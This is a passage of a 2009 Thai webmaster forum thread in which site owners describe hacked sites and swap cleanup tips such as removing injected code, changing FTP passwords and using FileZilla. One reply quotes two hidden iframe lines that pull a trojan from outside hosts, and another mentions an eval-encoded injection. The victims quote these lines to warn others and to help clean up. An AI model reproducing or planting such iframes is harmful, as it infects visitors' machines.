004275
หัวหน้าแก๊งเสียว
พลังน้ำใจ: 52
 ออฟไลน์
กระทู้: 2,158
|
 |
« ตอบ #20 เมื่อ: 17 เมษายน 2009, 10:04:06 » |
|
ลบสคริปต์ที่ฝังออกให้หมด แล้วเปลี่ยน pass ใหม่คับ
ลองดู ผมทำแลล้วหายอะคับ
|
|
|
|
|
บันทึกการเข้า
|
|
|
|
irecog
ก๊วนเสียว
พลังน้ำใจ: 7
ออฟไลน์
กระทู้: 203
|
|
« ตอบ #21 เมื่อ: 17 เมษายน 2009, 10:21:45 » |
|
มาเป็นกำลังใจครับ...อย่ายอมแพ้มันครับ...เพราะเอาเว็บเราเป็นเดิมพัน
|
|
|
|
|
บันทึกการเข้า
|
|
|
|
smith
สมุนแก๊งเสียว
พลังน้ำใจ: 51
ออฟไลน์
กระทู้: 581
|
|
« ตอบ #22 เมื่อ: 17 เมษายน 2009, 10:26:32 » |
|
เป็นที่ ฝั่ง server นะผมว่า เมื่อกี้ลองเช็คๆดู
ขนาดสคิปส์ที่ผมเขียนเอง ไว้ใช้คนเดียว ยังโดนเลย
ไฟล์ที่ขึ้นต้นด้วย home index default main โดนทุกไฟล์เลย
|
|
|
|
« แก้ไขครั้งสุดท้าย: 17 เมษายน 2009, 10:31:56 โดย smith »
|
บันทึกการเข้า
|
|
|
|
manchy
หัวหน้าแก๊งเสียว
พลังน้ำใจ: 85
ออฟไลน์
กระทู้: 2,164
|
|
« ตอบ #23 เมื่อ: 17 เมษายน 2009, 12:40:43 » |
|
ผมก็เพิ่งโดนสดๆเลยครับเว็ปในเครือโดนหมดเลยเซ็งๆๆ งานเข้าๆๆ  |
|
|
|
|
บันทึกการเข้า
|
|
|
|
prempcc
หัวหน้าแก๊งเสียว
พลังน้ำใจ: 94
ออฟไลน์
กระทู้: 1,276
|
|
« ตอบ #24 เมื่อ: 17 เมษายน 2009, 12:46:15 » |
|
มาเป็นกำลังใจให้หาทางออกได้
|
|
|
|
|
บันทึกการเข้า
|
|
|
|
arabanaki
หัวหน้าแก๊งเสียว
พลังน้ำใจ: 37
ออฟไลน์
กระทู้: 1,820
|
|
« ตอบ #25 เมื่อ: 17 เมษายน 2009, 12:51:49 » |
|
ผมก็โดนครับ รวดเดียวยี่สิบเว็บเลย โทรไปหา hosting เขาบอกให้ลบบรรทัดนั้นออก แล้วสร้างหน้า index.html ใส่ javascript ให้ redirect เข้าไปที่หน้า index.php แต่ว่าเราต้องย้ายเข้าไปให้ลึกกว่าชั้น root นะครับ เลยรอดตัวมาได้จนถึงทุกวันนี้ แต่ไม่รู้ว่าจะโดนอีกเมื่อไหร่  |
|
|
|
|
บันทึกการเข้า
|
|
|
|
ผีหัวโล้นผมยาว
หัวหน้าแก๊งเสียว
พลังน้ำใจ: 218
ออฟไลน์
กระทู้: 2,089
|
|
« ตอบ #26 เมื่อ: 17 เมษายน 2009, 15:22:47 » |
|
มันเกี่ยวกับ โปรแกรม FTP หรือเปล่าครับ |
|
|
|
|
บันทึกการเข้า
|
|
|
|
Robin
คนรักเสียว
พลังน้ำใจ: 9
ออฟไลน์
กระทู้: 194
|
|
« ตอบ #27 เมื่อ: 17 เมษายน 2009, 15:25:59 » |
|
เกือบทุกที่
แสดงว่า หลายHost
ผมว่าปัญหานี้น่าจะอยู่เจ้าตัวมากกว่า ไม่ได้อยู่ที่ host
ไม่งั้น Hosting เจ๊งกะบ๋ง ไปแล้ว
คิดดู
|
|
|
|
|
บันทึกการเข้า
|
|
|
|
Kobsoft
Verified Seller
หัวหน้าแก๊งเสียว
พลังน้ำใจ: 255
ออฟไลน์
กระทู้: 2,574
|
|
« ตอบ #28 เมื่อ: 17 เมษายน 2009, 15:44:01 » |
|
ตอนนี้ 00.40 ที่ผมกำลังทำอยู่คือ load web ลงมาทั้งยวงครับ แล้วกะจะ replace ไอ้ code นี้ ทั้ง folder ทิ้ง ตอนนี้ที่นึกวิธีออกก็มีเท่านี้ ยังโหลดลงมาไม่หมดเรย ใครมีวิธีที่ดีกว่านี้ช่วยแชร์กันด้วยนะครับ ขอบคุณครับ  ถ้าโดนใส่ iframe เป็น ip หรือ url ชุดเดิม หรือชุดใหม่เป็นผมปกติถ้าในเว็บผมไม่ได้ใช้ iframe ผมจะเขียนฟังก์ชั่นยกเิลิกคำสั่งแท็กของ iframe ให้ไม่มีค่าในการรันคับ เพราะนิสัยไอพวกนี้ ถ้าเราไปลบ หรืออัพไฟล์ใหม่ลงไป ยังไงมันก็เล่นเราอีก มันอยากยิงโค้ดมาก็ให้มันยิงมา แต่เขียนคำสั่งให้โค้ดมันรันไม่ได้ น่าจะเป็นทางเลือกอีกทางคับ ลองๆ ดู |
|
|
|
|
บันทึกการเข้า
|
|
|
|
oosora
หัวหน้าแก๊งเสียว
พลังน้ำใจ: 45
ออฟไลน์
กระทู้: 1,030
|
|
« ตอบ #29 เมื่อ: 17 เมษายน 2009, 15:53:01 » |
|
ขอแสดงความเสียใจอย่างสุดซึ้ง
|
|
|
|
|
บันทึกการเข้า
|
|
|
|
PrinzA
Newbie
พลังน้ำใจ: 0
ออฟไลน์
กระทู้: 1
|
|
« ตอบ #30 เมื่อ: 17 เมษายน 2009, 16:22:52 » |
|
แก้ permission เป็น 666 ครับ สำหรับ host window ถ้าเป็น host linux ไม่ค่อยมีปัญหาครับ สคริปตัวนี้จะโจมตีเฉพาะ ไฟล์สำคัญๆของเว็ปครับ
|
|
|
|
|
บันทึกการเข้า
|
|
|
|
smith
สมุนแก๊งเสียว
พลังน้ำใจ: 51
ออฟไลน์
กระทู้: 581
|
|
« ตอบ #31 เมื่อ: 18 เมษายน 2009, 13:50:22 » |
|
<iframe src="http://betbigwager.cn/in.cgi?income61" width=1 height=1 style="visibility: hidden"></iframe>
<iframe src="http://lotultimatebet.cn/in.cgi?income60" width=1 height=1 style="visibility: hidden"></iframe> อันตรายนะครับ รู้สึกมันจะไปเรียก trojan ที่ฝังอยู่ในเครื่องของเรา อีกที เครืองผมใช้ antivir มันฟ้องมาทุกครั้งที่เข้าเว็บผม แล้วเครื่องก็จะอึดๆไปสักพัก antivir ก็จะฟ้อง trojan ขึ้นมาชื่อ load.exe หรืออะไรประมาณนี้ พึ่งเอะใจ ว่าทำไมเข้าเว็บเราแล้วมันเจอ trojan ใครมีตัว remove โทรจัน รบกวนแนะนำหน่อยครับ |
|
|
|
|
บันทึกการเข้า
|
|
|
|
|
Shuriken
บุคคลทั่วไป
|
|
« ตอบ #32 เมื่อ: 22 เมษายน 2009, 10:38:04 » |
|
เจอปัญหาคล้ายๆผมเลยครับ แต่ของผมเป็น Hostmoster ทุก php ไฟล์ โดนฝังสคริป eval(decode asdfaczxgasgb มีผลไปถึงผลเสริชกูเกิ้ลนะครับสแปมคีเวิร์ดเต็มไปหมด ผมเดาสาเหตุนะครับว่า มาจากการที่เราใช้ ftp browser ครับ มันแฮกแิอคเค้าเราได้ แล้วส่งโทรจันเข้ามา ตอนนี้ต้องมานั่งลบทุกไฟล์เลยครับ อยากฝากถึงคนที่ทำนะครับ ว่าทำอย่างนี้ไม่เจริญหรอกครับ เอาความสามารถไปสร้างสรรดีกว่าครับ คุณทำแบบนี้ก็เหมือน ขโมยเค้ากินหลอกเค้ากินแหละครับ ผมเห็น บางเว็บ ที่เป็นพวก hacker คุยกันสนุกสนานเลยน ลองสคริปโน้นสริปนี้แฮกโน่นแฮกนี่ ลองวิชาไปเรื่อยไม่เจริญครับทำให้คนเค้าสาปแช่งกัน เลิกซะนะครับ ซื่อกินไม่หมดคดกินไม่นานครับ
|
|
|
|
|
บันทึกการเข้า
|
|
|
|
aussavin
หัวหน้าแก๊งเสียว
พลังน้ำใจ: 50
ออฟไลน์
กระทู้: 1,162
|
|
« ตอบ #33 เมื่อ: 23 เมษายน 2009, 10:52:56 » |
|
โดนเหมือนกันครับ เสียดายมาก เว็บลูกข่ายทั้งหลาย ตอนนี้ต้องทน กัดฟันทำใจ ให้เหลือแค่ 2 เว็บจะได้ดูแลทั่วถึง  |
|
|
|
|
บันทึกการเข้า
|
|
|
|
CommonSun
ก๊วนเสียว
พลังน้ำใจ: 41
ออฟไลน์
กระทู้: 252
|
|
« ตอบ #34 เมื่อ: 23 เมษายน 2009, 11:04:05 » |
|
วิธีแก้ไขเบื้องต้นนะครับ
1. ลบ code ที่ไวรัสนำมาฝังไว้ออกให้หมด ส่วนมากจะเป็นไฟล์หลัก เช่น index, home, default เป็นต้น
2. ทำการเปลี่ยนรหัสผ่าน ftp ทันที
3. หลีกเลี่ยงการ ftp ผ่าน browser โดยเฉพาะ internet explorer แนะนำให้ใช้ FileZilla ครับ
อย่าลืมหมั่น update และ scan virus ในเครื่องด้วยนะครับ
|
|
|
|
|
บันทึกการเข้า
|
|
|
|
senseword
สมุนแก๊งเสียว
พลังน้ำใจ: 22
ออฟไลน์
กระทู้: 560
|
|
« ตอบ #35 เมื่อ: 23 เมษายน 2009, 11:15:58 » |
|
ผมก็โดนเหมือนกันตอนนี้เวปผมเข้าไม่ได้แล้วตอนนั้น hippoba ก็โดนโดยใช้ iframe ได้ท่านคุณพ่อน้องนะโมช่วยตอนนี้ก็ย้ายแล้วเหลือบางส่วนในโฮส นึกว่าเป็นแค่เวปเดียวตอนนี้แบบเข้าโฮสไม่ได้เลยครับ แนะนำหน่อยครับ เวป save24hr.com ผลเป็นดังด้านล่าง http://server217.webhostingpad.com/suspended.page/ เมล์ไปเขาก็ตอบมา Hello, Your account was suspended due to "server abuse: session.php". In order to find out more details about the suspension, and to find out what you will need to do in order to the account unsuspended you will need to send an email to our managers, stating your primary domain name and ask what needs to be done in order to get the account unsuspended. managers email: [email protected] Thanks, Eric Schell ยังไงดีครับ |
|
|
|
« แก้ไขครั้งสุดท้าย: 23 เมษายน 2009, 11:23:16 โดย senseword »
|
บันทึกการเข้า
|
|
|
|
ayeweb
Verified Seller
เจ้าพ่อบอร์ดเสียว
พลังน้ำใจ: 321
ออฟไลน์
กระทู้: 5,205
|
|
« ตอบ #36 เมื่อ: 23 เมษายน 2009, 11:22:07 » |
|
ซวยจริงครับ
|
|
|
|
|
บันทึกการเข้า
|
|
|
|
mekz
Newbie
พลังน้ำใจ: 0
ออฟไลน์
กระทู้: 6
|
|
« ตอบ #37 เมื่อ: 25 เมษายน 2009, 10:34:40 » |
|
ตามความคิดผม ผมคิดว่าน่าจะมาจากโฮสติ้งที่ให้บริการนั่นแหละ ที่เอาไวรัสมาแถมใส่เว็บเรา (อาจจะด้วยความตั้งใจ หรือ ไม่ตั้งใจก็ตามแต่ (ส่วนใหญ่ติดในไฟล์ index.* ทุกนามสกุลมั้ง)  อาการของ NOD32 ถ้าพบว่าเว็บของเรามีสคริปอันตรายฝังไว้อยู่  หน้าตาของสคริปอันตรายที่ฝังในไฟล์ index.php ของ WP (ได้ภาพมาจาก iChetblog.net  ขอบคุณมา ณ ที่นี้ด้วย) ส่วนถ้าใครเจอปัญหานี้ก็ แนะนำให้ลบสคริปอันตรายออกให้หมดเสียก่อน จากนั้นตั้ง Permissions (CHMOD) ของไฟล์เป็น 664 เป็นการชั่วคราวไปก่อน หากต้องการแก้ก็ down ไฟล์ลงมาในเครื่องเพื่อแก้ไขไฟล์ น่าจะเป็นการดีกว่า ปล. ส่วน Wordpress จะติดเฉพาะไฟล์ index.php สองที่ คือ ที่ dir หลัก และ ที่เก็บไฟล์ธีมของเรา ปล2. ส่วนตัวยังไม่ได้เจอ (เพราะใช้ Host Linux ละมั้ง) เห็นคนอื่นเขาเจอ เลยเอามาเล่าสู่กันฟังครับ |
|
|
|
|
บันทึกการเข้า
|
|
|
|
w_nittaya
ก๊วนเสียว
พลังน้ำใจ: 10
ออฟไลน์
กระทู้: 434
|
|
« ตอบ #38 เมื่อ: 25 เมษายน 2009, 10:51:36 » |
|
|
|
|
|
|
บันทึกการเข้า
|
|
|
|
mr.sit
สมุนแก๊งเสียว
พลังน้ำใจ: 20
ออฟไลน์
กระทู้: 617
|
|
« ตอบ #39 เมื่อ: 06 พฤษภาคม 2009, 23:14:38 » |
|
ใช้ filezilla บน linux มีสิทธิ์ติดด้วยมั้ยครับ? เพราะเมื่อครู่เข้าเว็บแล้วเจอแดงเถือกเลย เผลอ ftp เข้าไปแล้วด้วย ยังดีที่ยังไม่ได้เรียกดูเว็บเพราะ Firefox เตือนก่อน
|
|
|
|
|
บันทึกการเข้า
|
|
|
|
|
Host and Domain
